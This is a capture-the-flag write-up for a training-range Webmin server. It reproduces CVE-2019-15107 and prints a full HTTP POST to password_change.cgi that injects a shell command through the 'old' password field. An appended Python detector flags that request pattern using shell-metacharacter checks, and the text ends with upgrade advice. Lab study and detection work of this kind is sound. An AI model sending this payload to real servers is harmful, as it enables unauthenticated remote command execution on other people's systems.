墨者学院 (Mozhe Academy): Webmin Unauthenticated Remote Code Execution
2022-07-04 07:40:00 [Lyswbb]
First, after getting the target range, browse to it; you land on a login page.
The challenge title tells us this is an unauthenticated RCE, so start by looking up the historical CVE number (CVE-2019-15107) and then reproduce the vulnerability directly. The vulnerable point is the password reset feature: Webmin -- Webmin Configuration -- Authentication.
Capture the request with Burp and modify the parameters. Note that session_login.cgi has to be changed to password_change.cgi; the parameters below can be copied as they are. Triggering this vulnerability only requires passing an expired parameter along with the command to execute.
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
Then simply read key.txt under the root directory.
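As an added detection example (not part of the original writeup), the Python below inspects request records and flags POSTs to password_change.cgi that carry the expired parameter together with shell metacharacters in a form field, which is the shape of the request above. The sample traffic is constructed; its first entry reuses the body shown in the writeup.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Characters that do not belong in a legitimate Webmin password field but
# are what an injected command relies on (the writeup's body uses '|').
SHELL_META = re.compile(r"[|;&`<>\n]|\$\(")


def inspect_request(method: str, path: str, body: str) -> dict:
    """Classify one request; returns {'suspicious': bool, 'reasons': [...]}."""
    reasons = []
    script = urlsplit(path).path.rsplit("/", 1)[-1]
    if method.upper() != "POST" or script != "password_change.cgi":
        return {"suspicious": False, "reasons": reasons}
    form = parse_qs(body, keep_blank_values=True)
    if "expired" in form:
        reasons.append("expired parameter present (expired-password code path)")
    for field, values in form.items():
        for value in values:
            if SHELL_META.search(value):
                reasons.append(f"shell metacharacter in field {field!r}: {value!r}")
    # Only the combination matches CVE-2019-15107; a bare expired flag is normal UI use,
    # and a metacharacter in a real password without it is at most a weak signal.
    suspicious = "expired" in form and any("metacharacter" in r for r in reasons)
    return {"suspicious": suspicious, "reasons": reasons}


# Constructed sample traffic (method, path, body); entry 0 is the writeup's payload.
SAMPLE_REQUESTS = [
    ("POST", "/password_change.cgi",
     "user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2"),
    ("POST", "/password_change.cgi",
     "user=alice&pam=&expired=1&old=Winter2022!&new1=Spring2023!&new2=Spring2023!"),
    ("POST", "/session_login.cgi", "user=alice&pass=hunter2"),
]


def scan(requests=SAMPLE_REQUESTS) -> list:
    """Return the indexes of the requests judged suspicious."""
    return [i for i, (m, p, b) in enumerate(requests)
            if inspect_request(m, p, b)["suspicious"]]


if __name__ == "__main__":
    for i, (m, p, b) in enumerate(SAMPLE_REQUESTS):
        print(i, inspect_request(m, p, b))
```

The same check can be applied to Webmin's miniserv access log or to a WAF rule; the fix on the server side is upgrading Webmin past 1.920, the last release that shipped the vulnerable password_change.cgi.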